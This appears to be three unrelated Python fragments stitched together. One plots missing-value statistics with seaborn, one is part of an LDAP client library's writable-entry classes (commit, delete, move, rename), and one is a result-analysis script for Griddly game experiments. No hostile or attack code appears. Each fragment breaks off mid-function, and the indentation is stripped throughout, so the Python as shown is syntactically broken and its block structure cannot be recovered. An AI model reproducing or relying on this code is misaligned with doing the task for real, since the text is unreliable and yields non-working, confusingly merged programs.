sns.set_color_codes('pastel')
sns.barplot(x='N V', y='feature_shortened', data=n_mv_fw_l, ax=ax,
color='lightgray', label=f'Not missing', dodge=False)
sns.set_color_codes('muted')
sns.barplot(x='N MV', y='feature_shortened', data=n_mv_fw_l, ax=ax,
color='b', label=f'Missing - Not applicable')
sns.set_color_codes("dark")
sns.barplot(x='N MV2', y='feature_shortened', data=n_mv_fw_l, ax=ax,
color="b", label=f'Missing - Not available')
ax.legend(ncol=1, loc='lower right', frameon=True,
title='Type of values')
ax.set(ylabel='Features', xlabel='Number of values')
ax.tick_params(labelsize=7)
sns.despine(left=True, bottom=True, ax=ax)
# Remove y labels if more than 40
if n_mv_fw_l.shape[0] > nf_max:
ax.tick_params(axis='y', which='both', left=False, labelleft=False)
fig.tight_layout(rect=(0, 0, 1, .92))
else:
fig.tight_layout(rect=(0., 0, 1, .92))
return fig, ax
def plot_feature_wise_v2(indicators, plot=False, show=True, ax=None, nf_max=40, color='b'):
"""Plot the statistics feature-wise."""
n_mv_fw = indicators['feature-wise']
if show:
with pd.option_context('display.max_rows', None):
print(
f'\n'
f'Statistics feature-wise:\n'
f'------------------------\n'
f'\n'
f'{n_mv_fw}'
)
if plot:
# Plot proportion of missing values in each feature
# Copy index in a column for the barplot method
n_mv_fw['feature'] = n_mv_fw.index
n_mv_fw['id'] = np.arange(n_mv_fw.shape[0])
# Get rid of the features with no missing values
n_mv_fw_l = n_mv_fw
if ax is None:
fig, ax = plt.subplots(figsize=(10, 8))
else:
fig = plt.gcf()
sns.set_color_codes('pastel')
handle_nm, = ax.stackplot(n_mv_fw_l['id'].values, 100, color='lightgray', labels=['Not missing'])
handle_m, = ax.stackplot(n_mv_fw_l['id'].values, n_mv_fw_l['F MV'].values, color=color, labels=['Missing'])
# ax.stackplot(n_mv_fw_l['id'].values, n_mv_fw_l['N V'].values, color='lightgray', labels=['Not missing'])
# ax.stackplot(n_mv_fw_l['id'].values, n_mv_fw_l['N MV'].values, color='b', labels=['Missing'])
# ax.legend(ncol=1, loc='upper right', frameon=True,
# title='Type of values')
# ax.set(xlabel='Features', ylabel='Proportion')
# ax.set(xlabel='Features', ylabel='Number of values')
ax.tick_params(labelsize=7)
sns.despine(left=True, bottom=True, ax=ax)
# Remove y labels if more than 40
if n_mv_fw.shape[0] > nf_max:
fig.tight_layout(rect=(0, 0, 1, .92))
else:
fig.tight_layout(rect=(0., 0, 1, .92))
return fig, ax, (handle_nm, handle_m)
def plot_rows(indicators, plot=False, show=True, ax=None):
"""Plot stats on rows without missing values."""
# Get required indicators
df = pd.concat([indicators['rows'], indicators['global']], axis=1)
n_r_wo_mv = df.at[0, 'n_r_wo_mv']
n_r_w_mv = df.at[0, 'n_r_w_mv']
n_r_w_mv1_o = df.at[0, 'n_r_w_mv1_o']
n_r_w_mv2_o = df.at[0, 'n_r_w_mv2_o']
n_r_w_mv_1a2 = df.at[0, 'n_r_w_mv_1a2']
f_r_wo_mv = df.at[0, 'f_r_wo_mv']
f_r_w_mv = df.at[0, 'f_r_w_mv']
f_r_w_mv1_o = df.at[0, 'f_r_w_mv1_o']
f_r_w_mv2_o = df.at[0, 'f_r_w_mv2_o']
f_r_w_mv_1a2 = df.at[0, 'f_r_w_mv_1a2']
n_rows = df.at[0, 'n_rows']
if show:
print(
f'\n'
f'Statistics on rows:\n'
f'-------------------\n'
f'N rows: {n_rows}\n'
f'N rows without MV: {n_r_wo_mv} ({f_r_wo_mv:.2f}%)\n'
f'N rows with MV: {n_r_w_mv} ({f_r_w_mv:.2f}%)\n'
f' N rows with MV1 only: {n_r_w_mv1_o} ({f_r_w_mv1_o:.2f}%)\n'
f' N rows with MV2 only: {n_r_w_mv2_o} ({f_r_w_mv2_o:.2f}%)\n'
f' N rows with MV1 and MV2: {n_r_w_mv_1a2} ({f_r_w_mv_1a2:.2f}%)\n'
)
if plot:
# Plot proportion of features with missing values
df_show = pd.DataFrame({
'N MV': [n_r_w_mv],
'N MV1 only': [n_r_w_mv1_o],
'N MV2 only': [n_r_w_mv2_o],
'N MV 1 xor 2': [n_r_w_mv1_o + n_r_w_mv2_o],
'N R': [n_rows],
'type': ['Full data frame']
})
if ax is None:
_, ax = plt.subplots(figsize=(10, 4))
sns.set_color_codes('pastel')
sns.barplot(x='N R', y='type', data=df_show, color='lightgray', ax=ax,
label=f'No missing values ({n_r_wo_mv} • {f_r_wo_mv:.2f}%)')
sns.set_color_codes('pastel')
sns.barplot(x='N MV', y='type', data=df_show, color='r', ax=ax,
label=f'Not applicable and not available ({n_r_w_mv_1a2} • {f_r_w_mv_1a2:.2f}%)')
sns.set_color_codes('muted')
sns.barplot(x='N MV 1 xor 2', y='type', data=df_show, color='r', ax=ax,
label=f'Not applicable only ({n_r_w_mv1_o} • {f_r_w_mv1_o:.2f}%)')
sns.set_color_codes('dark')
sns.barplot(x='N MV2 only', y='type', data=df_show, color='r', ax=ax,
label=f'Not available only ({n_r_w_mv2_o} • {f_r_w_mv2_o:.2f}%)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width*0.5, box.height*0.5])
ax.legend(ncol=1, loc='center left', frameon=True,
title='Type of missing values contained in the row',
bbox_to_anchor=(1.05, 0.5))
ax.set(ylabel='', xlabel=f'Number of rows (Total {n_rows})')
ax.set_title('Proportion of rows having missing values')
sns.despine(left=True, bottom=True, ax=ax)
# Remove y labels
ax.tick_params(axis='y', which='both', left=False, labelleft=False)
def plot_rm_rows(indicators, plot=False, show=True, ax=None):
"""Plot number of rows affected if we remove features with MV."""
# Get required indicators
df = pd.concat([indicators['rm_rows'], indicators['global']], axis=1)
n_r_a_rm_mv1 = df.at[0, 'n_r_a_rm_mv1']
n_r_a_rm_mv2 = df.at[0, 'n_r_a_rm_mv2']
n_r_a_rm_mv_1o2 = df.at[0, 'n_r_a_rm_mv_1o2']
n_r_a_rm_mv1_o = df.at[0, 'n_r_a_rm_mv1_o']
n_r_a_rm_mv2_o = df.at[0, 'n_r_a_rm_mv2_o']
n_r_a_rm_mv_1a2 = df.at[0, 'n_r_a_rm_mv_1a2']
f_r_a_rm_mv1 = df.at[0, 'f_r_a_rm_mv1']
f_r_a_rm_mv2 = df.at[0, 'f_r_a_rm_mv2']
f_r_a_rm_mv_1o2 = df.at[0, 'f_r_a_rm_mv_1o2']
f_r_a_rm_mv1_o = df.at[0, 'f_r_a_rm_mv1_o']
f_r_a_rm_mv2_o = df.at[0, 'f_r_a_rm_mv2_o']
f_r_a_rm_mv_1a2 = df.at[0, 'f_r_a_rm_mv_1a2']
n_rows = df.at[0, 'n_rows']
if show:
print(
f'N rows losing information if we remove features with :\n'
f' MV1: {n_r_a_rm_mv1} ({f_r_a_rm_mv1:.2f}%)\n'
f' MV2: {n_r_a_rm_mv2} ({f_r_a_rm_mv2:.2f}%)\n'
f' MV: {n_r_a_rm_mv_1o2} ({f_r_a_rm_mv_1o2:.2f}%)\n'
f' MV1 only: {n_r_a_rm_mv1_o} ({f_r_a_rm_mv1_o:.2f}%)\n'
f' MV2 only: {n_r_a_rm_mv2_o} ({f_r_a_rm_mv2_o:.2f}%)\n'
f' MV1 and MV2: {n_r_a_rm_mv_1a2} ({f_r_a_rm_mv_1a2:.2f}%)\n'
)
if plot:
# Plot number of rows losing information when removing features with MV
df_show = pd.DataFrame({
'N rows affected': [
n_r_a_rm_mv1,
n_r_a_rm_mv2,
| |
stream.write(prepare_for_stream(header + line_separator + line_separator))
stream.write(prepare_for_stream(ldif_output + line_separator + line_separator))
return ldif_output
class Entry(EntryBase):
"""The Entry object contains a single LDAP entry.
Attributes can be accessed either by sequence, by assignment
or as dictionary keys. Keys are not case sensitive.
The Entry object is read only
- The DN is retrieved by entry_dn
- The Reader reference is in _cursor()
- Raw attributes values are retrieved by the _ra_attributes and
_raw_attribute() methods
"""
def entry_writable(self, object_def=None, writer_cursor=None, attributes=None, custom_validator=None, auxiliary_class=None):
conf_operational_attribute_prefix = get_config_parameter('ABSTRACTION_OPERATIONAL_ATTRIBUTE_PREFIX')
if not self.entry_cursor.schema:
error_message = 'schema must be available to make an entry writable'
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorError(error_message)
# returns a new WritableEntry and its Writer cursor
if object_def is None:
if self.entry_cursor.definition._object_class:
object_def = self.entry_definition._object_class
auxiliary_class = self.entry_definition._auxiliary_class + (auxiliary_class if isinstance(auxiliary_class, SEQUENCE_TYPES) else [])
elif 'objectclass' in self:
object_def = self.objectclass.values
if not object_def:
error_message = 'object class must be specified to make an entry writable'
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorError(error_message)
if not isinstance(object_def, ObjectDef):
object_def = ObjectDef(object_def, self.entry_cursor.schema, custom_validator, auxiliary_class)
if attributes:
if isinstance(attributes, STRING_TYPES):
attributes = [attributes]
if isinstance(attributes, SEQUENCE_TYPES):
for attribute in attributes:
if attribute not in object_def._attributes:
error_message = 'attribute \'%s\' not in schema for \'%s\'' % (attribute, object_def)
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorError(error_message)
else:
attributes = []
if not writer_cursor:
from .cursor import Writer # local import to avoid circular reference in import at startup
writable_cursor = Writer(self.entry_cursor.connection, object_def)
else:
writable_cursor = writer_cursor
if attributes: # force reading of attributes
writable_entry = writable_cursor._refresh_object(self.entry_dn, list(attributes) + self.entry_attributes)
else:
writable_entry = writable_cursor._create_entry(self._state.response)
writable_cursor.entries.append(writable_entry)
writable_entry._state.read_time = self.entry_read_time
writable_entry._state.origin = self # reference to the original read-only entry
# checks original entry for custom definitions in AttrDefs
attr_to_add = []
attr_to_remove = []
object_def_to_add = []
object_def_to_remove = []
for attr in writable_entry._state.origin.entry_definition._attributes:
original_attr = writable_entry._state.origin.entry_definition._attributes[attr]
if attr != original_attr.name and (attr not in writable_entry._state.attributes or conf_operational_attribute_prefix + original_attr.name not in writable_entry._state.attributes):
old_attr_def = writable_entry.entry_definition._attributes[original_attr.name]
new_attr_def = AttrDef(original_attr.name,
key=attr,
validate=original_attr.validate,
pre_query=original_attr.pre_query,
post_query=original_attr.post_query,
default=original_attr.default,
dereference_dn=original_attr.dereference_dn,
description=original_attr.description,
mandatory=old_attr_def.mandatory, # keeps value read from schema
single_value=old_attr_def.single_value, # keeps value read from schema
alias=original_attr.other_names)
od = writable_entry.entry_definition
object_def_to_remove.append(old_attr_def)
object_def_to_add.append(new_attr_def)
# updates attribute name in entry attributes
new_attr = WritableAttribute(new_attr_def, writable_entry, writable_cursor)
if original_attr.name in writable_entry._state.attributes:
new_attr.other_names = writable_entry._state.attributes[original_attr.name].other_names
new_attr.raw_values = writable_entry._state.attributes[original_attr.name].raw_values
new_attr.values = writable_entry._state.attributes[original_attr.name].values
new_attr.response = writable_entry._state.attributes[original_attr.name].response
attr_to_add.append((attr, new_attr))
attr_to_remove.append(original_attr.name)
# writable_entry._state.attributes[attr] = new_attr
## writable_entry._state.attributes.set_alias(attr, new_attr.other_names)
# del writable_entry._state.attributes[original_attr.name]
for attr, new_attr in attr_to_add:
writable_entry._state.attributes[attr] = new_attr
for attr in attr_to_remove:
del writable_entry._state.attributes[attr]
for object_def in object_def_to_remove:
o = writable_entry.entry_definition
o -= object_def
for object_def in object_def_to_add:
o = writable_entry.entry_definition
o += object_def
writable_entry._state.set_status(STATUS_WRITABLE)
return writable_entry
class WritableEntry(EntryBase):
def __setitem__(self, key, value):
if value is not Ellipsis: # hack for using implicit operators in writable attributes
self.__setattr__(key, value)
def __setattr__(self, item, value):
conf_attributes_excluded_from_object_def = [v.lower() for v in get_config_parameter('ATTRIBUTES_EXCLUDED_FROM_OBJECT_DEF')]
if item == '_state' and isinstance(value, EntryState):
self.__dict__['_state'] = value
return
if value is not Ellipsis: # hack for using implicit operators in writable attributes
# checks if using an alias
if item in self.entry_cursor.definition._attributes or item.lower() in conf_attributes_excluded_from_object_def:
if item not in self._state.attributes: # setting value to an attribute still without values
new_attribute = WritableAttribute(self.entry_cursor.definition._attributes[item], self, cursor=self.entry_cursor)
self._state.attributes[str(item)] = new_attribute # force item to a string for key in attributes dict
self._state.attributes[item].set(value) # try to add to new_values
else:
error_message = 'attribute \'%s\' not defined' % item
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorAttributeError(error_message)
def __getattr__(self, item):
if isinstance(item, STRING_TYPES):
if item == '_state':
return self.__dict__['_state']
item = ''.join(item.split()).lower()
for attr in self._state.attributes.keys():
if item == attr.lower():
return self._state.attributes[attr]
for attr in self._state.attributes.aliases():
if item == attr.lower():
return self._state.attributes[attr]
if item in self.entry_definition._attributes: # item is a new attribute to commit, creates the AttrDef and add to the attributes to retrive
self._state.attributes[item] = WritableAttribute(self.entry_definition._attributes[item], self, self.entry_cursor)
self.entry_cursor.attributes.add(item)
return self._state.attributes[item]
error_message = 'attribute \'%s\' not defined' % item
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorAttributeError(error_message)
else:
error_message = 'attribute name must be a string'
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorAttributeError(error_message)
@property
def entry_virtual_attributes(self):
return [attr for attr in self.entry_attributes if self[attr].virtual]
def entry_commit_changes(self, refresh=True, controls=None, clear_history=True):
if clear_history:
self.entry_cursor._reset_history()
if self.entry_status == STATUS_READY_FOR_DELETION:
result = self.entry_cursor.connection.delete(self.entry_dn, controls)
if not self.entry_cursor.connection.strategy.sync:
response, result, request = self.entry_cursor.connection.get_response(result, get_request=True)
else:
response = self.entry_cursor.connection.response
result = self.entry_cursor.connection.result
request = self.entry_cursor.connection.request
self.entry_cursor._store_operation_in_history(request, result, response)
if result['result'] == RESULT_SUCCESS:
dn = self.entry_dn
if self._state.origin and self.entry_cursor.connection.server == self._state.origin.entry_cursor.connection.server: # deletes original read-only Entry
cursor = self._state.origin.entry_cursor
self._state.origin.__dict__.clear()
self._state.origin.__dict__['_state'] = EntryState(dn, cursor)
self._state.origin._state.set_status(STATUS_DELETED)
cursor = self.entry_cursor
self.__dict__.clear()
self._state = EntryState(dn, cursor)
self._state.set_status(STATUS_DELETED)
return True
return False
elif self.entry_status == STATUS_READY_FOR_MOVING:
result = self.entry_cursor.connection.modify_dn(self.entry_dn, '+'.join(safe_rdn(self.entry_dn)), new_superior=self._state._to)
if not self.entry_cursor.connection.strategy.sync:
response, result, request = self.entry_cursor.connection.get_response(result, get_request=True)
else:
response = self.entry_cursor.connection.response
result = self.entry_cursor.connection.result
request = self.entry_cursor.connection.request
self.entry_cursor._store_operation_in_history(request, result, response)
if result['result'] == RESULT_SUCCESS:
self._state.dn = safe_dn('+'.join(safe_rdn(self.entry_dn)) + ',' + self._state._to)
if refresh:
if self.entry_refresh():
if self._state.origin and self.entry_cursor.connection.server == self._state.origin.entry_cursor.connection.server: # refresh dn of origin
self._state.origin._state.dn = self.entry_dn
self._state.set_status(STATUS_COMMITTED)
self._state._to = None
return True
return False
elif self.entry_status == STATUS_READY_FOR_RENAMING:
rdn = '+'.join(safe_rdn(self._state._to))
result = self.entry_cursor.connection.modify_dn(self.entry_dn, rdn)
if not self.entry_cursor.connection.strategy.sync:
response, result, request = self.entry_cursor.connection.get_response(result, get_request=True)
else:
response = self.entry_cursor.connection.response
result = self.entry_cursor.connection.result
request = self.entry_cursor.connection.request
self.entry_cursor._store_operation_in_history(request, result, response)
if result['result'] == RESULT_SUCCESS:
self._state.dn = rdn + ',' + ','.join(to_dn(self.entry_dn)[1:])
if refresh:
if self.entry_refresh():
if self._state.origin and self.entry_cursor.connection.server == self._state.origin.entry_cursor.connection.server: # refresh dn of origin
self._state.origin._state.dn = self.entry_dn
self._state.set_status(STATUS_COMMITTED)
self._state._to = None
return True
return False
elif self.entry_status in [STATUS_VIRTUAL, STATUS_MANDATORY_MISSING]:
missing_attributes = []
for attr in self.entry_mandatory_attributes:
if (attr not in self._state.attributes or self._state.attributes[attr].virtual) and attr not in self._changes:
missing_attributes.append('\'' + attr + '\'')
error_message = 'mandatory attributes %s missing in entry %s' % (', '.join(missing_attributes), self.entry_dn)
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorError(error_message)
elif self.entry_status == STATUS_PENDING_CHANGES:
if self._changes:
if self.entry_definition._auxiliary_class: # checks if an attribute is from an auxiliary class and adds it to the objectClass attribute if not present
for attr in self._changes:
# checks schema to see if attribute is defined in one of the already present object classes
attr_classes = self.entry_cursor.schema.attribute_types[attr].mandatory_in + self.entry_cursor.schema.attribute_types[attr].optional_in
for object_class in self.objectclass:
if object_class in attr_classes:
break
else: # executed only if the attribute class is not present in the objectClass attribute
# checks if attribute is defined in one of the possible auxiliary classes
for aux_class in self.entry_definition._auxiliary_class:
if aux_class in attr_classes:
if self._state._initial_status == STATUS_VIRTUAL: # entry is new, there must be a pending objectClass MODIFY_REPLACE
self._changes['objectClass'][0][1].append(aux_class)
else:
self.objectclass += aux_class
if self._state._initial_status == STATUS_VIRTUAL:
new_attributes = dict()
for attr in self._changes:
new_attributes[attr] = self._changes[attr][0][1]
result = self.entry_cursor.connection.add(self.entry_dn, None, new_attributes, controls)
else:
result = self.entry_cursor.connection.modify(self.entry_dn, self._changes, controls)
if not self.entry_cursor.connection.strategy.sync: # asynchronous request
response, result, request = self.entry_cursor.connection.get_response(result, get_request=True)
else:
response = self.entry_cursor.connection.response
result = self.entry_cursor.connection.result
request = self.entry_cursor.connection.request
self.entry_cursor._store_operation_in_history(request, result, response)
if result['result'] == RESULT_SUCCESS:
if refresh:
if self.entry_refresh():
if self._state.origin and self.entry_cursor.connection.server == self._state.origin.entry_cursor.connection.server: # updates original read-only entry if present
for attr in self: # adds AttrDefs from writable entry to origin entry definition if some is missing
if attr.key in self.entry_definition._attributes and attr.key not in self._state.origin.entry_definition._attributes:
self._state.origin.entry_cursor.definition.add_attribute(self.entry_cursor.definition._attributes[attr.key]) # adds AttrDef from writable entry to original entry if missing
temp_entry = self._state.origin.entry_cursor._create_entry(self._state.response)
self._state.origin.__dict__.clear()
self._state.origin.__dict__['_state'] = temp_entry._state
for attr in self: # returns the whole attribute object
if not hasattr(attr,'virtual'):
self._state.origin.__dict__[attr.key] = self._state.origin._state.attributes[attr.key]
self._state.origin._state.read_time = self.entry_read_time
else:
self.entry_discard_changes() # if not refreshed remove committed changes
self._state.set_status(STATUS_COMMITTED)
return True
return False
def entry_discard_changes(self):
self._changes.clear()
self._state.set_status(self._state._initial_status)
def entry_delete(self):
if self.entry_status not in [STATUS_WRITABLE, STATUS_COMMITTED, STATUS_READY_FOR_DELETION]:
error_message = 'cannot delete entry, invalid status: ' + self.entry_status
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorError(error_message)
self._state.set_status(STATUS_READY_FOR_DELETION)
def entry_refresh(self, tries=4, seconds=2):
"""
Refreshes the entry from the LDAP Server
"""
if self.entry_cursor.connection:
if self.entry_cursor.refresh_entry(self, tries, seconds):
return True
return False
def entry_move(self, destination_dn):
if self.entry_status not in [STATUS_WRITABLE, | |
<filename>result_handler.py<gh_stars>0
import random
import matplotlib.pyplot as plt
import json
import os
import copy
import numpy as np
from enum import Enum
from itertools import product
import play_back_tool
import action_space_builder
from ptitprince import PtitPrince as pt
from test_group import get_cem_parameters
import video_exporter
from datetime import datetime
import pandas as pd
from create_griddly_env import create_griddly_env
TEST_GROUP_SIZE = 30*4*3
PAPER_WIDTH = (29.7-5)/2.54
PAPER_HEIGHT = (21.0-6)/2.54
DIFF_X_LIM = [-1.0, 1.5]
SCORE_X_LIM = [0.88, 5.5]
class CollectActionType(Enum):
SEPARATE = 0
EMBEDDED = 1
class SubDataSet:
def __init__(self, file_prefix, name, data):
self.file_prefix = file_prefix
self.name = name
self.data = data
class ScoreDifferenceRecorder:
def __init__(self, cem_pairs):
self.max_diff_per_pair = {pair: -1000000 for pair in cem_pairs}
self.runs_with_max_diff = {pair: [] for pair in cem_pairs}
self.min_diff_per_pair = {pair: 1000000 for pair in cem_pairs}
self.runs_with_min_diff = {pair: [] for pair in cem_pairs}
self.cem_pairs = cem_pairs
def update_with_diff(self, diff, cem_pair, run_key1, run_key2):
if diff > self.max_diff_per_pair[cem_pair]:
self.max_diff_per_pair[cem_pair] = diff
self.runs_with_max_diff[cem_pair] = [(run_key2, run_key1)]
elif diff == self.max_diff_per_pair[cem_pair]:
self.runs_with_max_diff[cem_pair].append((run_key2, run_key1))
if diff < self.min_diff_per_pair[cem_pair]:
self.min_diff_per_pair[cem_pair] = diff
self.runs_with_min_diff[cem_pair] = [(run_key2, run_key1)]
elif diff == self.min_diff_per_pair[cem_pair]:
self.runs_with_min_diff[cem_pair].append((run_key2, run_key1))
def make_videos(self, data_set):
full_data = data_set.data
subdir = 'extreme_differences'
cem_names = get_cem_param_names(full_data)
for cem_pair in list(self.cem_pairs):
i = 0
for run_key1, run_key2 in self.runs_with_max_diff[cem_pair]:
self.build_path_and_videos(cem_names, data_set, subdir, cem_pair, run_key1, run_key2, 'max', i)
i += 1
i = 0
for run_key1, run_key2 in self.runs_with_min_diff[cem_pair]:
self.build_path_and_videos(cem_names, data_set, subdir, cem_pair, run_key1, run_key2, 'min', i)
i += 1
def build_path_and_videos(self, cem_names, data_set, subdir, cem_pair, run_key1, run_key2, min_or_max, stepper):
assert(min_or_max in ['max', 'min'])
run1 = data_set.data['game_runs'][run_key1]
run2 = data_set.data['game_runs'][run_key2]
subdir2 = data_set.name
subdir3 = '_'.join(sorted([cem_names[run1['CemParams']], cem_names[run2['CemParams']]]))
max_or_min_diff = str(self.max_diff_per_pair[cem_pair]) if min_or_max == 'max' else str(self.min_diff_per_pair[cem_pair])
file_name1 = '_'.join([max_or_min_diff, cem_names[run1['CemParams']], str(stepper), run_key1])
video_exporter.make_video_from_data(run1, os.path.join(subdir, subdir2, subdir3, min_or_max), file_name1, frames_per_state=20)
file_name2 = '_'.join([max_or_min_diff, cem_names[run2['CemParams']], str(stepper), run_key2])
video_exporter.make_video_from_data(run2, os.path.join(subdir, subdir2, subdir3, min_or_max), file_name2, frames_per_state=20)
def get_result_object():
result_file_name = input('Enter the name of the result file: ')
with open(os.path.join('results', result_file_name), 'r') as result_file:
result_object = json.load(result_file)
return result_object
def select_complete_test_groups(result_obj):
all_game_rules = result_obj['game_rules']
complete_game_rules = []
for game_rule_obj in all_game_rules.values():
test_group_finished = 'game_runs' in game_rule_obj and len(game_rule_obj['game_runs']) == TEST_GROUP_SIZE
action_builder = action_space_builder.CollectorActionSpaceBuilder()
valid_action_set = action_builder.player_set_validation(set(game_rule_obj['PlayerActions']))
if test_group_finished and valid_action_set:
complete_game_rules.append(game_rule_obj)
complete_test_run_keys = []
for game_rule in complete_game_rules:
complete_test_run_keys += game_rule['game_runs'].values()
return build_data_for_selected_runs(result_obj, complete_test_run_keys)
def build_data_for_selected_runs(full_data, run_keys):
filtered_result = {
'cem_params': {},
'map_params': {},
'game_rules': {},
'game_runs': {}
}
for game_run_key in run_keys:
filtered_result['game_runs'][game_run_key] = full_data['game_runs'][game_run_key] #copy.deepcopy(result_obj['game_runs'][game_run_key])
build_top_level_obj(full_data, run_keys, filtered_result, 'game_rules')
build_top_level_obj(full_data, run_keys, filtered_result, 'cem_params')
build_top_level_obj(full_data, run_keys, filtered_result, 'map_params')
return filtered_result
def build_top_level_obj(full_data, run_keys, current_data_obj, top_level_name):
for param_obj_key, param_obj in full_data[top_level_name].items():
if not 'game_runs' in param_obj:
continue
filtered_param_obj = copy.deepcopy(param_obj)
for dict_key, game_run_key in param_obj['game_runs'].items():
if game_run_key not in run_keys:
del filtered_param_obj['game_runs'][dict_key]
if len(filtered_param_obj['game_runs']) > 0:
current_data_obj[top_level_name][param_obj_key] = filtered_param_obj
def select_with_collect_type(full_data, type):
selected_runs = []
for game_rules_obj in full_data['game_rules'].values():
separate_collect = False
if 'collect' in game_rules_obj['PlayerActions'] or 'collect_from_ahead' in game_rules_obj['PlayerActions']:
separate_collect = True
if separate_collect and type is CollectActionType.SEPARATE or not separate_collect and type is CollectActionType.EMBEDDED:
selected_runs += [game_run_key for game_run_key in game_rules_obj['game_runs'].values()]
return selected_runs
def select_with_map_size(full_data, map_width, map_height):
selected_runs = []
for map_params in full_data['map_params'].values():
if map_params['Height'] == map_height and map_params['Width'] == map_width:
selected_runs += [game_run_key for game_run_key in map_params['game_runs'].values()]
return selected_runs
def select_with_run_score(full_data, min_score, max_score):
selected_runs = []
for game_run_key, game_run_obj in full_data['game_runs'].items():
if game_run_obj['Score'][0] >= min_score and game_run_obj['Score'][0] <= max_score:
selected_runs.append(game_run_key)
return selected_runs
def plot_difference_histograms(data_set, save_folder, make_max_min_videos=False):
figure, axs = plt.subplots(3, 1)
figure.set_tight_layout(True)
data = data_set.data
test_batches = group_runs_by_params(data, ['GriddlyDescription', 'GameRules', 'Map'], return_keys=True)
score_diffs_per_pair = extract_score_diffs_per_pair(data_set, test_batches, make_max_min_videos)
emp_param_names = get_cem_param_names(data)
pair_order = [
'Supportive-Antagonistic',
'Random-Antagonistic',
'Random-Supportive'
]
for pair, diffs in score_diffs_per_pair.items():
pair_name = emp_param_names[pair[1]] + '-' + emp_param_names[pair[0]]
print(pair_name, 'Mean difference:', np.mean(diffs))
sub_plot_idx = pair_order.index(pair_name)
axs[sub_plot_idx].hist(diffs, bins=16, range=(-8.5, 7.5), linewidth=0.5, edgecolor='white')
axs[sub_plot_idx].set_title(data_set.name + ', ' + emp_param_names[pair[1]] + '-' + emp_param_names[pair[0]])
if sub_plot_idx == len(pair_order) - 1:
axs[sub_plot_idx].set_xlabel('Score difference between CEM-parametrizations')
axs[sub_plot_idx].set_ylabel('Number of pairs')
figure.set_size_inches(PAPER_WIDTH/3, PAPER_HEIGHT)
if save_folder:
figure.savefig(os.path.join(save_folder, data_set.file_prefix + 'diff_histograms.svg'))
plt.close()
else:
plt.show()
def extract_score_diffs_per_pair(data_set, test_batches, make_max_min_videos=False):
full_data = data_set.data
cem_pairs = get_cem_param_pairs(full_data)
score_diffs_per_pair = {pair: [] for pair in cem_pairs}
diff_recorder = ScoreDifferenceRecorder(cem_pairs)
for test_batch in test_batches.values():
for run1_idx in range(len(test_batch)):
for run2_idx in range(run1_idx + 1, len(test_batch)):
run_key1 = test_batch[run1_idx]
run_key2 = test_batch[run2_idx]
run1 = full_data['game_runs'][run_key1]
run2 = full_data['game_runs'][run_key2]
if run1 == run2:
continue
cem_pair = tuple(sorted([run1['CemParams'], run2['CemParams']]))
diff = run2['Score'][0] - run1['Score'][0]
# Make sure the diff is "cem_pair_1"-"cem_pair_0" and not "cem_pair_0"-"cem_pair_1"
if run2['CemParams'] == cem_pair[0]:
diff = -diff
score_diffs_per_pair[cem_pair].append(diff)
diff_recorder.update_with_diff(diff, cem_pair, run_key1, run_key2)
if make_max_min_videos:
diff_recorder.make_videos(data_set)
return score_diffs_per_pair
def plot_run_score_raincloud(data_set, save_folder):
data = data_set.data
figure, ax = plt.subplots()
cem_order = ['Supportive', 'Random', 'Antagonistic']
cem_names = get_cem_param_names(data)
data_frame = prepare_raincloud_data(data, cem_names)
ax = pt.RainCloud(x='cem_param', y='action_set_mean', data=data_frame, ax=ax, order=cem_order, orient='h', palette='Set2')
ax.set_title('Mean scores of test groups\n' + data_set.name)
ax.xaxis.grid(visible=True)
ax.set_xlim(SCORE_X_LIM)
figure.set_size_inches(PAPER_WIDTH/2, PAPER_HEIGHT)
figure.set_tight_layout(True)
if save_folder:
figure.savefig(os.path.join(save_folder, data_set.file_prefix + 'avg_score_raincloud.svg'))
plt.close()
else:
plt.show()
def plot_run_score_matrix(full_data, save_folder):
figure, axs = plt.subplots(1, len(full_data['map_params']))
cem_order = ['Supportive', 'Random', 'Antagonistic']
runs_per_map = group_runs_by_params(full_data, ['MapParams'], return_keys=True)
map_names = get_map_param_names(full_data)
map_key_i = 0
cem_names = get_cem_param_names(full_data)
for map_param_key, runs in runs_per_map.items():
data = build_data_for_selected_runs(full_data, runs)
data_frame = prepare_raincloud_data(data, cem_names)
axs[map_key_i] = pt.RainCloud(x='cem_param', y='action_set_mean', data=data_frame, palette='Set2', ax=axs[map_key_i], orient='h', order=cem_order, bw=0.2)
axs[map_key_i].set_title('Map param: ' + map_names[map_param_key[0]], fontsize=10)
axs[map_key_i].xaxis.grid(visible=True)
axs[map_key_i].yaxis.set_visible(map_key_i == 0)
axs[map_key_i].set_xlim(SCORE_X_LIM)
map_key_i += 1
figure.set_size_inches(PAPER_WIDTH, PAPER_HEIGHT)
figure.set_tight_layout(True)
if save_folder:
figure.savefig(os.path.join(save_folder, 'avg_result_matrix.svg'))
plt.close()
else:
plt.show()
def prepare_raincloud_data(data, cem_names):
groups_to_average = group_runs_by_params(data, ['CemParams', 'GameRules', 'MapParams'])
avg_scores_per_group = {group_key: np.mean([run['Score'] for run in group_runs]) for group_key, group_runs in groups_to_average.items()}
df_data = []
for group_key, avg_score in avg_scores_per_group.items():
cem_name = cem_names[group_key[0]]
df_data.append((cem_name, avg_score))
return pd.DataFrame.from_records(df_data, columns=['cem_param', 'action_set_mean'])
def plot_avg_diff_rainclouds(data_set, save_folder):
def make_cem_param_name(cem_param_names, pair):
short_names = {
'Supportive': 'sup',
'Antagonistic': 'ant',
'Random': 'rnd'
}
return short_names[cem_param_names[pair[1]]] + '-' + short_names[cem_param_names[pair[0]]]
def print_outliers(title, lo_outliers, hi_outliers):
print('Outliers for pair', title)
print('Low outliers:')
for lo_outlier in lo_outliers:
print('GameRules:', lo_outlier[0][0], 'MapParams:', lo_outlier[0][2], 'Value:', lo_outlier[1])
print('High outliers:')
for hi_outlier in hi_outliers:
